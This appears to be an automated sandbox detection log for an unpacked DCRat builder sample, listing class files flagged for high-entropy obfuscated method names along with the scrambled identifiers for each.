              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, vOUSlNrluZFMtRC00b1.csHigh entropy of concatenated method names: 'JUUYOvFZZT', 'Mv2YmVcCp8', 'dZ6gBbTLh4nWhd37bkw', 'Mx1vSCTiPLlt6PTPt2E', 'qDetnYTyEC91haLh9vQ', 'eBVL4XTXM2MVgVHjYaK', 'EVMEpTTv7Jvr4TyomEc', 'KpjBgSTVwbd8WFo04HE', 'jE7O2ETzfVjGu8JXRVb', 'sFuUIer5SZB3Sh8m0er'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, U5c5ALXZYnNckYqevqc.csHigh entropy of concatenated method names: '_7v4', 'YZ8', '_888', 'G9C', 'f09U5t3ARcqrBrpVEYD', 'ct2y2e3dnrycLrh6NaX', 'MobS5m38985beDy6WNj', 'nUebAf3oHQ1O4dk9Q5g', 'IgQk6P3TKMToUJ8Bvwc', 'NhSq7Y3rEjOFCh1y78t'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, vdTvwykPKYw0ihdLp6t.csHigh entropy of concatenated method names: '_525', 'L97', '_3t2', 'UL2', '_6V2', '_968', 'BL6EZHjGgpFPFb4Ba8m', 's9EZ0hj0QajvLceDhuS', 'Vexvujj7qbyaXMsTmO4', 'sghfZnjleEPGRHdp6XX'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, lw6lLjDnqcnsu0RQKqd.csHigh entropy of concatenated method names: 'A9Ug2VnJNn', 'VyWgDjqVxr', 'A5IgcGped8', 'MqDgP0KB6M', 'tVogB3VWXJ', 'sQGu0wnoFcft6FDgbmy', 'DgbTtOnTIYbnD6NAlHx', 'GHxGkundYyImpZjeTRF', 'EyaAW5n8vjXRJIHJva0', 'Vvq9H2nr91VqCaFAZ7K'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, dCZaLq43G3e24QElXD.csHigh entropy of concatenated method names: 'b46ktZGAb', 'wEh37mdV7G1b3Ty191', 'bpD0iLFC6srr6It8Fv', 'Hc0SeaA8MeosNT4BEG', 'FIC7WK8uHTMRQ7cGdV', 'if8UxGoUV0YV12SyjV', 'j9qG87eYB', 'ArBbV4pN6', 'aiIKePb3Q', 'HlRwVPGL8'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, ReUYoKOQ56dexA6oG2.csHigh entropy of concatenated method names: 'g25', 'YZ8', '_23T', 'G9C', 'PxvrgccYH', 'HtsxvUmo6TAc1LJfgeC', 'Iy6jE6mTfsOv2TjK85C', 'bNa8QAmrQT9xdubb5IE', 'o2OEbcm2EccEYIJF5rw', 'wm0Z9UmDd53SVv7WMBf'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, rjYXO1Xt7HXwh5cqqeY.csHigh entropy of concatenated method names: 'ISXGfM30dj', 'ig7GxKgUWP', 'BTHY9D31unHeMETIVYy', 'Rv2wEv3MFNm2vht8Rhx', 'Bu4vku33rAc7ilEbglB', 'QP8POI3cFFO0iJjgad2', 'TTkOmr3GXmfMNARc7Sn', 'KGtf0r305nG4V02Y8y4', 'uWLtBp37k5pvKaM5B8x', 'F7xfN03l6oQwAU1fbGL'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, tp1VHAMlJ4NNAG3oSlG.csHigh entropy of concatenated method names: 'WFHbdbLjpw', 'QL6b2NnYqJ', 'YrUbDB5aF3', 'f2nbcdiIwx', 'WlgbPfWREI', 'qRLbBdrsuJ', 'E9sbZudlWA', 'JVjE3XGJZMAg4vUEoRy', 'UonqBHGj4hOMf2TWXSo', 'd7fFGGGZQGlMg2KjGk9'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, en8I1MJvnXbnluCgtB.csHigh entropy of concatenated method names: 'YxVYVlySR', 'wqFX7fO2n', 'VxIHFt53R', 'XWvuTJWjp', 'KQh5QMAxv', 'xIs6k5POS', 'ccr0QPoel', 'Io8yeta66LwTteBFGJA', 'kc8KvLaPo5ZaH9HU3K6', 'e9iqfkaMYCs4nO9wBIu'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, LF8f8kDR88y5ca079GD.csHigh entropy of concatenated method names: 'P29', '_3xW', 'bOP', 'Th1', '_36d', 'vdVlyIcO6a', 'lfulUeauR7', 'r8j', 'LS1', '_55S'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, qPskceXmrixwxJjbNGH.csHigh entropy of concatenated method names: '_589', 'YZ8', '_491', 'G9C', 'V8I6VE3g1nJXMXDcnab', 'Pwv28P3SmEN7Hpe8xd2', 'A1V5Zj3sh0NcUtkf8Ky', 'sAioci3eYcfSWALgDpY', 'wdAlBR3LdmOHgfKWHd2', 'ULvxqa3iPo8yCLoRaue'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, NnXO6EXSUsBwIS3XxOE.csHigh entropy of concatenated method names: 'd43', 'YZ8', 'g67', 'G9C', 'XOqi6p4YECwlVHNubds', 'EK4wOD4Kl5rUTSIgGQY', 'XwqntP4E1GymDI3CP4S', 'iACoWq4q6aseTxUNBDj', 'wim2TV4FXnLEZI3XY95', 'dGo3Cl4A4XhaaCNy4af'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, feFamedYfxyCYds7cQ.csHigh entropy of concatenated method names: '_23T', 'YZ8', 'ELp', 'G9C', 'YGTq3mOyXydscR02VlD', 'gIPflmOXChXfUp6tVVi', 'CVYw2ROv76UqDMXA631', 'W4g6IFOVU8d5FlTAg62', 'rk7OCROzAkA4wJxachZ', 'vfBDQof5eAbFUj21ZB2'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, qPKTHmm9orwIlGudmS.csHigh entropy of concatenated method names: 'pHw', 'YZ8', 'v2R', 'G9C', 'DCx7QfHKu4OLc8hvDcu', 'Am1lvhHEMyQKo7BGfmu', 'gO8EePHqgeUpMLYbD3M', 'Fu5NCBHFQQf2IwrgMGT', 'bxdi6fHAjWs6x6CX2DN', 'kpvJF9Hd7PKaMdIQkMS'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, uJqfieXFIghvENbe8e8.csHigh entropy of concatenated method names: 'k1hSt6VImW', 'LbxfkIMr5yPBEXvTq3B', 'KGmfh9M2u1BmCOxFNKJ', 'J3TngTMoPcWVd1c0b2b', 'YjARhIMTV2f4swVfHRE', 'SU9Ay2MDbqloLpArqb3', '_3Xh', 'YZ8', '_123', 'G9C'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, i0puI4Xp3qt6CQH4YxG.csHigh entropy of concatenated method names: 'kNf', 'YZ8', 'U31', 'G9C', 'XL7ghn6o9eIkpdPmGLJ', 'v0sQdR6TqCNlpZr9Jfi', 'GIdZ1s6rP1rPOgBHuCb', 'ptKEBs62Glg12Q3xM4t', 'gcwMsv6DWorrhEDD0gl', 'Hm1hR36tqlxPE4w5YUM'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, pD0hMnMaSpk8HN57u9o.csHigh entropy of concatenated method names: 'EH5bzkRYua', 'ImAKTvPwv9', 'Ya7KSGRImM', 'HrrKGVkL3A', 'jOhKbh4LTp', 'AHiKKFGYkL', 'NyZKwA0dxP', 'X4lKebcDoM', 'hrmKWiEOXj', 'nC9KR1LJ0c'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, QFLqVS5PaWP8Gb60HvS.csHigh entropy of concatenated method names: 'nFWHOY8XNY', 'BFKHmRdUy7', 'GlGHQ1DogG', 'TVjHJAmFvV', 'QoeH9iyu8y', 'mgo77WtXAN9bVcgEhp9', 'uqcj9ktvwqAhsSWG4JE', 'otnvI9tVpgw23j7PfNs', 'qNm8A4tzebk1QYkMsGQ', 'UY2mfWb5ImtoV79CQ6U'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, CKFSINM76vVq76E8chw.csHigh entropy of concatenated method names: 'MmFWXWdXe4', 'MjNYfPUStTvltS2CH7h', 'ttZPBdUCdvsK6S2ZXLk', 'DKSWoLUg9qFlNTkfoXw', 'hGKCBOUsdBMIqCCV0q7', 'yUhw1JUe7Qeesw130x4', 's5eWLvAAsN', 'lekWC1nGwA', 'ekrWOK20C2', 'rF3Wm5xTA9'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, obhmbxMd7KOfTiSDKTh.csHigh entropy of concatenated method names: 'yC7eRP6pOU', 'Gg2eF2CB69', 'mC3XkCWilx0KntRqZEW', 'glbhDtWygYUD1NL9Sek', 'jxwGUbWeeQ41otjW3rR', 'mfPXJHWLQOn1PyaPNN8', 'cFMe3GAdE4', 'gpLZx8U5I3ZLubdCC0p', 'LGpo8jUa7DVvvPxIVRm', 'xSl36qWVNR5mue29TaT'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, n75vDiDCEN2dLk9ZHh0.csHigh entropy of concatenated method names: 'ICU', 'j9U', 'IBK', '_6qM', 'Amn', 'Mc2', 'og6', 'z6i', '_5G6', 'r11'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, oPLvoJrEpe9xPPokXMK.csHigh entropy of concatenated method names: '_14Y', 'b41', 'D7Y', 'xMq', 'i39', '_77u', '_4PG', '_5u8', 'h12', '_2KT'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, N0ZL0jrWWfceRYrduTr.csHigh entropy of concatenated method names: 'HpxXKPwCQv', 'OemXw6yjcw', 'LRcXeK6bu6', 'aAWXW9sZ09', 'mEeXR9ORSD', 'HBcXFK4mUP', 'rpBXit76I7', 'zgNXfSxwKR', 'XVbXxjI6Ox', 'iDYXgrcHpq'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, frrJupkSmosdxLocHUR.csHigh entropy of concatenated method names: '_223', 'rf8DkkQWGmysf7NdrNi', 'Gy1ECTQUWkoClmjQgwY', 'E7F9OEQNNAFEU0osmYF', 'WPsWaZQxJwTMmwNHk9D', 'avLX0IQQ18byRowSfj3', 'CtgseSQ96PnQjkJeCu0', 'oDUQd6QjVleCqFCJCud', 'sdHlVyQZXiuHuwh1jKu', 'hcHEw2QJ5V5JV22bFIi'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, zsJx2m5VH3sr1ufsdeO.csHigh entropy of concatenated method names: 'PJ1', 'jo3', 'fV00FTpAsX', 'ydp0iQBSky', 'A2E0frISXW', 'EC9', '_74a', '_8pl', '_27D', '_524'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, cHU5Gukm0GCCGa2f6F7.csHigh entropy of concatenated method names: '_269', '_5E7', 'lEaGrjxerf', 'Mz8', 'XlWG33CjyM', 'LM4cWaZs6SOOT87Fv5J', 'DuXLy6ZeWEwSjpmcdfX', 'UEtRK6ZLDVv2TcBudro', 'V8N2Y8ZiDvMVXWZK63Z', 'p5mVd4ZyW4fmse5dvJB'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, NO97mGXPMbHRGZxQaFA.csHigh entropy of concatenated method names: 'gHL', 'YZ8', 'vF9', 'G9C', 'koHYPK6JJMZvepDOGEx', 'Wsamyc6BJMB1ByBQMre', 'zFi7yV6ns0R6WZIBcWv', 'qFcOdH6YBfdWJt7gchD', 'MQKnvg6KZ6nFWd5yvBG', 'lg4CGv6EQRlNEmWDqaA'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, a75LDG5iWX2UXuyn4PO.csHigh entropy of concatenated method names: 'D4M', '_4DP', 'HU2', '_4Ke', '_5C9', '_7b1', 'lV5', 'H7p', 'V5L', '_736'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, UtIu7cXip8x48vme9aw.csHigh entropy of concatenated method names: 'Ai7', 'YZ8', '_56U', 'G9C', 'p3Udd96Vauibh2sflIe', 'GMDv4s6zn4oxU9omEje', 'MRrSFVP5rIepLmL6IIB', 'PlZwd9PaXgP3dUFGwk2', 'YjpTFTPmgOurWVCupxP', 'DTYs4FPOd3uQtYEPRgV'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, RxNhJUX2wVQDPVqKhTB.csHigh entropy of concatenated method names: '_6U6', 'YZ8', '_694', 'G9C', 'gyltxx4NxXMvy0shpqm', 'erxs8T4x1tekLwqR0TP', 'edbmEj4Q6PYpI48u4oE', 'mvobGH49EHcc8YlkSUy', 'ngx8Kr4jmjifbS2ho84', 'lcWFkW4ZkeaXFMaTmUo'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, ac7WH95UvuBd3LGJiGL.csHigh entropy of concatenated method names: '_7tu', '_8ge', 'DyU', '_58f', '_254', '_6Q3', '_7f4', 'B3I', '_75k', 'd4G'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, MnkY9kXrawIUFk0neBy.csHigh entropy of concatenated method names: 'K55', 'YZ8', '_9yX', 'G9C', 'pa1UBtIpGJJWxQh45ia', 'qtxmEYIhH0Dk6rBWNU4', 'jYNZPTICkbXOYPSZKlb', 'nBhSWiIgt7GThcLJ452', 'OUnkrVISG84FHro0My9', 'LfXcMKIspwA8O5ujmRe'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, g9m6KQXbMqnUXlHgurF.csHigh entropy of concatenated method names: 'yiQ', 'YZ8', '_5li', 'G9C', 'vqQ50w6577CLglyqQnm', 'N7TBj26aEOXxuBjYKaK', 'zWxrZj6memAfA7tRQSk', 'oxXloB6O5ApvIwKecPA', 'n3S91p6frX5A8itDh9v', 'QuehVV6HIV2kOOtvcah'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, fj489oMfawRYiVEqp9g.csHigh entropy of concatenated method names: 'eoZbI6UFwk', 'Y5qLEv0OHFGsQbfan0K', 'hZ4QoG0fNjeX3bZda72', 'xC9h4I0awK3c4olDM28', 'CwugtT0mjUH8epc1REW', 'pYWEG50HYrHxUmeNAHA', 'FtBg4B0IT4sMMQ4L6nR', 'sbK4BI04iQb02i59Fhh', 'BWYdjK06Du7ghmR2A6r', 'MQ7P8D0PXts1JsePWoH'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, qTPb4AXjt1OIWelh5jF.csHigh entropy of concatenated method names: 'I3RSMTPTbN', 'OAyd99MJWV1RSyv5ZYB', 'wnMfVMMB6EpIov1JjNH', 'fCj2qQMjrRgObAy9YqY', 'QN2qclMZ3sFLBZilRFJ', 'VgPYUQMnapn8FVFxNZe', 'QLw', 'YZ8', 'cC5', 'G9C'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, mlMyl0kVxeZ8wvyTBpO.csHigh entropy of concatenated method names: '_5u9', 'UWtG1Ud0SF', 'XRmiTCs3lF', 'nunGNP0eJV', 'FuHFZxjXP8tdwmASCl7', 'hXjirSjvQ5cpHcysxEo', 'MHPrqKjVQ2Dl1ve8lYO', 'o23EZkjiZwEnIcmSonr', 'ACbxdFjy2QXeUl8Cqvk', 'ANaiHAjzTVSHTdKhDxj'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, UmMYin5p1p0reIKFPZO.csHigh entropy of concatenated method names: 'IGD', 'CV5', 'LWYHYLXcDn', '_3k4', 'elq', 'hlH', 'yc1', 'Y17', '_2QC', 'En1'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, osLxLH55SPrmOauDYlb.csHigh entropy of concatenated method names: 'Qkp', '_72e', 'R26', '_7w6', 'Awi', 'n73', 'cek', 'ro1', '_9j4', '_453'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, PVStjT4hn5scdS4lfYS.csHigh entropy of concatenated method names: 'zennxapns0kgYECEyXU', 'IDSbeupYd10gm1gHI2H', 'Hdi5GJpJUtZadn3F7Ps', 'kwJqBNpBR3UQM5IjmCn', 'NyNjlWWMpL', 'rXdQbCpq5PDENGbQRfp', 'zY2SfhpF2w6lTfk59cA', 'QtJ0dKpA4yPdMI4orFR', 'HcXBANpde69lcrNrQej', 'RDAjOmp84UZbZexSDNS'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, CM4kAN6rt2XyLtJnvw.csHigh entropy of concatenated method names: 'XhhD68my8', 'bTfcdG2kw', 'VCjPOSZbl', 'fIb0XUa2PNKN7n30qdi', 'MjxBECaTZRMmWARPnOu', 'kN2PFsareqCyD1xqQCT', 'rGL3tfaDk5qHTjSjpS9', 'X4h22xatN9drIPERMPs', 'WGliUjabVRkKSAZIFlP', 'aWCcOQau8Q90rVG1kZV'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, uoxBGjMjKvrMiFQ2XTW.csHigh entropy of concatenated method names: 'tRpw0fqXCI', 'OktkiswvPjn5Rhp4iL4', 'y3APjGwVmFABZctNXvq', 'Om14wVwy2llYKH7bjbo', 'fX4JwtwXAEEfIqetWVf', 'yUNFVXwzRG7SmHdvGgP', 'TdwS93W5pcam6XKbAkd', 'gnjFvAWaUwjvcrHCkJd', 'UH1v9OWmmWSxuYq1IL9', 'c8aBMTWOZ7W3r4rMgXJ'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, AbyF6Y5ccPaRSV6vWJu.csHigh entropy of concatenated method names: 'bHCuFkiX6R', 'olquiexRZV', 'LocufcjKwE', '_3Gf', '_4XH', '_3mv', '_684', '_555', 'Z9E', 'dRouxKu5l7'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, TIXglEXlBKhU9Q9nv23.csHigh entropy of concatenated method names: '_3fO', 'YZ8', '_48A', 'G9C', 'cyaYqc44gHmGph6oXwB', 'CMsSf646BQP5OtIVkMi', 'HjklpI4P9hZrdO81ooH', 'nm8Hqg4MEhQU5U840XH', 'Gronp743Jcjgn420asF', 'W13ltG41vFAvB20m1MZ'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, dWejQuXfi0XPOmmXSRA.csHigh entropy of concatenated method names: 'rU3', 'YZ8', 'M54', 'G9C', 'IfxUbs4DcXQq4yxvWe7', 'inCr4I4tMuCFpYaPhXn', 'tQ5erm4bSchQIWRfbIo', 'utPMxm4u7Bt1hFgbCeF', 'g25p7R4RCb3TPlwHMEG', 'ODqbiq4kwv9u4GYXrEt'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, nUM0x3rkhJ5uxCKcnJJ.csHigh entropy of concatenated method names: 'naAxiodjbJyJRmCcJ6H', 'zg1wnjdZcg30VwvUn5D', 'l3TgmqdQKALkYgFZFum', 'v5kUr0d9neaxkS3TBik', 'fRBOYwFPQ3', 'uBlC25dn1n1CaZ9QmUa', 'qog9J8dYM37TiHAFTdZ', 'qbxuMUdJdlYWrQM9Jee', 'CxNFGHdB0esYdageIAT', 'mt5GRGdK3lDVTaifZib'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, oHajG1kfAgYJUeXXET1.csHigh entropy of concatenated method names: 'l1fRraTj8P', 'DNsRsy2qWw', 'RtrRNqXaiG', 'mOQRnj0loD', 'QK7lEOQ8DZlZ7D5mOhE', 'O7HKoeQoG0fpwgTjTHe', 'oXim4wQTDRY0HlOyOvD', 'g2GEuEQA2LRYC7KpRML', 'gBHkxcQdYrVj3d0iW6J', 'jwHhyjQrTfNAxyFo4cH'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, feCK3kkzDZ70xu9KtFd.csHigh entropy of concatenated method names: 'NCbi5vJ4mV', 'W6fi684QSC', 'M8li0lSxw1', 'kU3YmwJbJqaKp62mZ2E', 'nBfeMsJurQ8BeEtH74A', 'E0AB5UJDKqBsT3wtFSp', 'fFOcF9JtrguTfNa3I2d', 'IVhRB3JRXNCUi07oanp', 'kEevGHJkJi6i6xuTX9a', 'wuZRYBJp6NjxI3QtJvN'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, csvTTBDe7UV0o4HHj3K.csHigh entropy of concatenated method names: '_45b', 'ne2', '_115', '_3vY', 'BuIkTRLHIu', '_3il', 'fGZkSSXVe9', 'R7HkGKwq8W', '_78N', 'z3K'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, EWcsSUr0fAoCVl1wmAU.csHigh entropy of concatenated method names: 'q4Y', '_71O', '_6H6', 'dIFX9wtMi4', '_13H', 'I64', '_67a', '_71t', 'fEj', '_9OJ'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, fsZkwSZXHf0Xv0mVD5.csHigh entropy of concatenated method names: '_8Ok', 'YZ8', 'InF', 'G9C', 'Oql8cXH7LAmjP98KowS', 'x0ysf1HlKiEJO3deNNI', 'sgROWWHwAaFOCvowtm8', 'eJRxCiHWPDv1PMQwtbd', 'BP8BaCHUtIB0aSV6r41', 'lLX9hnHNHRnYTmMc5kF'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, StuS5UFYUNN3WcTAGg.csHigh entropy of concatenated method names: '_59M', 'YZ8', '_1zA', 'G9C', 'yTA5UKOTJSeqoUSRwQE', 'eHxMjoOrKPqpg2kkd6L', 'tHc9doO28bp9WPvCVyu', 'VEBBPTODGQup8f2GYLt', 'DJlw3UOtCTfkjKsJKow', 'Lp4VVeObshiWvOiWerR'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, nvHsMUGWsdX0G3LO0P.csHigh entropy of concatenated method names: 'T43', 'YZ8', '_56i', 'G9C', 'xFWXvcm3BHRuPbcvti3', 'EySrKOm1UZShrk0XtGy', 'fkySKwmckuH44Vwae3I', 'eA0l3fmGHdmFsvIjgwq', 'ly5HrKm0mcS0wgf9o4m', 'EQOC1Gm7EyT6XpvO3kk'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, V8JCbEk9AccBknpBX1p.csHigh entropy of concatenated method names: 'NC1R2LKK6r', 'Ev5RDLyTB9', 'IUkRcLFwVk', 'iIYWErQ0teIJccwt6hR', 'HZeSyKQcemZSfKSpRps', 'CfQRMjQGwhytemtCSGJ', 'gMoHAHQ7qeYYPjFjO1X', 'NVpRytBwSt', 'UMuRU5rvCI', 'NGKR3yjCtM'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, lOkbQbBb0NfPWduKuZ.csHigh entropy of concatenated method names: '_3OK', 'YZ8', '_321', 'G9C', 'EZ6dhlmvqq9GG96Wpx1', 'BpkokymVojm7NBpxKOy', 'lXxDffmzuRgcNbj9RNx', 'ukMTCIO5aeG0kBJVABD', 'nJ2gnUOa0T5M4HAJkLa', 'vZA6XpOmGGO1hi50qml'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, FUvTB8XuAIE6KpJsY4R.csHigh entropy of concatenated method names: 'BefSNVSem8', 'EqlZxaMm0WqmvifengF', 'h4wD2pMOOwjOfoFVotU', 'xkEvejM5OeNjqnfLaRq', 'dsOMUrMaC54hw2fcmQd', 'B0KVKTMfjBhru3mXOUg', 'toA0KiMH56UW8awX31I', 'F8gNrRMIAAYhn86xVQm', 'dQ0SEpqDyt', 'OsoZ6RMP0S8psSloYfk'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, jxUFL6rQt3GR0sxiYTL.csHigh entropy of concatenated method names: 'AYGYAKZenm', 'TIrYMOEeIL', 'Ic6Y1EBWiT', 'Y0JYIU8ZsO', 'Fk7Ya2y5cI', 'QKYYtEEuX3', 'gmju8OrCNplKkQgCTf5', 'cYNyvArpAwgWgToirKF', 'l3UnQ0rhEKf7SCqxMhj', 'ejyQhqrgrOeqX9MfHIN'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, gxlrpek1LvGoYoBLo6h.csHigh entropy of concatenated method names: 'sg9', 'bZ1G5YLGSg', 'wyxFtydHyD', 'loOGpZRDcv', 'nI3onRjCVIhSrqcmBqJ', 'lxKnfMjgtJ3wk4d2sA9', 'vmRpWDjSane75GQFNv2', 'goD72QjpvgusU3qTXx3', 'bCDGWKjhelJZKegbbsM', 'Q8VcMEjsb2OHqmcylMp'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, MTJPGvHNe9SAZAXfcK.csHigh entropy of concatenated method names: '_52Y', 'YZ8', 'Eg4', 'G9C', 'BqK4hu3qM', 'chxPjRmNaj7BlMQxeeX', 'dUeau1mx2OfKUujpr1h', 'fu2u5RmQyOsNtVmO3vg', 'GKq1Skm93xrM2CT7s8G', 'IetaQPmjiuPBlafPsC2'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, ikXWGe4UA9BrWQEbsnG.csHigh entropy of concatenated method names: 'ibIjYD8vpq', 'OtvjXth9sU', 'H2CjHNVbiY', 'IVXjuM4e4A', 'LlQj5eh1u3', 'rXMj6IKTlX', 'w6Zj0NrXlp', 'gbbjvrDwDU', 'vfXjjN1TMt', 'jEojdo4Ykv'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, uZ0L4x5Hfw6UKScHjWP.csHigh entropy of concatenated method names: '_159', 'rI9', '_2Cj', 'NZNuXBaZH3', 'HA2uHS0u9T', 'pvcuuJMb7N', 'w75u5DP9pl', 'nNIu6CWViJ', 'Venu04Kcjp', 'YcT0EuurW7Z5pjO8KJy'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, OJZPS1kZg5X8hT0kG6M.csHigh entropy of concatenated method names: '_3VT', 'O5t', '_1W5', 'HgWifOVYc5', 'nOCGsp0COO', 'BPOix6JvR8', 'lJMG2m3Tse', 'I7oIS7Z232TD1L3nwGb', 'sJag91ZDxgTveZvm1pG', 'iLsUSXZThLdkHHdL8E3'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, LM6iZlrc3Q8eNxGK50m.csHigh entropy of concatenated method names: 'zaeYsMFgRk', 'XXiYNJlrvy', 'OOVYnyP0vI', 'CnFWjJroeIf8bjIkBP3', 'VxqMDlrdYr5ps40e2gU', 'DJQqSgr87FwcLA2gA9L', 'CLpJAJrTTN8XV0I95vi', 'Ejnb54rrKpkI2mv2ouM'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, kGWL5KDSskg6lsJK6ms.csHigh entropy of concatenated method names: 'JJwxcrm7uM', 'NarxPLRLSq', 'foNxByZNE2', 'YN0xZP6dTM', 'tACx4fFvJH', 'SpQLNCBV0dSDXRPtxpZ', 'EtRMNrBzyJYM0xbMLc3', 'GM97B5BXRFXYvq4TYwM', 'kuaTtVBviEfWQTexKS3', 'BxsTeyn5pmxKOxrK4Li'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, uD1CEWXcCe05jYVwLlt.csHigh entropy of concatenated method names: 'GvP', 'YZ8', 'bp6', 'G9C', 'sJbbV2PTd9lw7kmcXcf', 'pBPLgvPrUGolZtICfYL', 'DVq9U9P2tKYY5ZKhqGL', 'HmRXcCPDIF9fQ82lCTW', 'AFpk4bPt90yQ5KG8FqR', 'euIAfJPbAvGwQsuUabc'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, KyOTmgriHr2hnFRE7We.csHigh entropy of concatenated method names: 'dFjYZU8M0l', 'Tw5Y4RX1Ow', 'TeoYVur8xX', 'aOsYopxaj2', 'WgtYr7lEkZ', 'iwBllprKJ0nmGABStXO', 'rcqMYkrn3vV39EsJh57', 'nKtBknrYgMGmwIU9eNB', 'ttOIS9rE4iHEKsn4c9T', 'b51YgCrqaIAXJuX4JCo'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, dshDBGXU7CTxFAQ7LDy.csHigh entropy of concatenated method names: 'p23', 'YZ8', 'Gog', 'G9C', 'UqSAn26hIeiWumHmUBg', 'BDNKpN6CDAdSCDxoYg1', 'GMRXxE6g3mNhaeQ6O7q', 'jEejwo6S03EeFIASZJ7', 'G891ka6sQO3nxf13vOi', 'ikDPLe6ecFxd93MfwVq'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, Cgq2kvzosEAKCPyPAH.csHigh entropy of concatenated method names: 'Y29', 'YZ8', 'jn6', 'G9C', 'LFElhQIO4TyZseuaabr', 'miirRgIfHHUcSfONAiW', 'OLZXc3IHYj0o99osII6', 'DoS34iIIDGi86AoriD5', 'BqbvoBI4IOulXHJdqV8', 'agPVhEI669AQbmvxnui'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, GDQqU3XvsenXvHLY6L0.csHigh entropy of concatenated method names: 'aKHGSKjCGI', 'U7wGG60rol', 'wIhGbqF00I', 'zE0gIpMsp1GJNWQTfb9', 'BiMaa2MeLSdPFisOULb', 'e72fBJMgULsnDUR036G', 'j4RRIjMSaAExUSybLPk', 'atnSK3ML3rmi08lhx69', 'vDYrMPMiMYCEoAWkroe', 'TirSG3MyetO7RHV5xTH'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, eiKljD5OouuANgNXZMt.csHigh entropy of concatenated method names: 'aEjQAORfXTN5S7yjuEU', 'MRAkIhRHeJB0bdcQhnX', 'oy3HS0RmJWQZcYHAhCd', 'IRFVbuROCN9rK38XY5P', 'HxmuDUeyii', 'WM4', '_499', 'PNOucrvbDy', 'BEVuPw9WKO', 'RaxuBHVbam'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, Oerw6JMJ8naxclaQ7Wt.csHigh entropy of concatenated method names: 'k8FKmB5qJt', 'b7NKQb5MGD', 'R3aKJ3u49p', 'CLZK9STSgB', 'JeHKYlx0LP', 'JDt3Cnl5HtuVTTFJLsS', 'Nt9hUulaWQRCiTbuViW', 'xDPHtG7VJd5g7oWRnVp', 'eArFiF7zkTrofasD8aK', 'YHN2EflmYh0IsAbxgid'
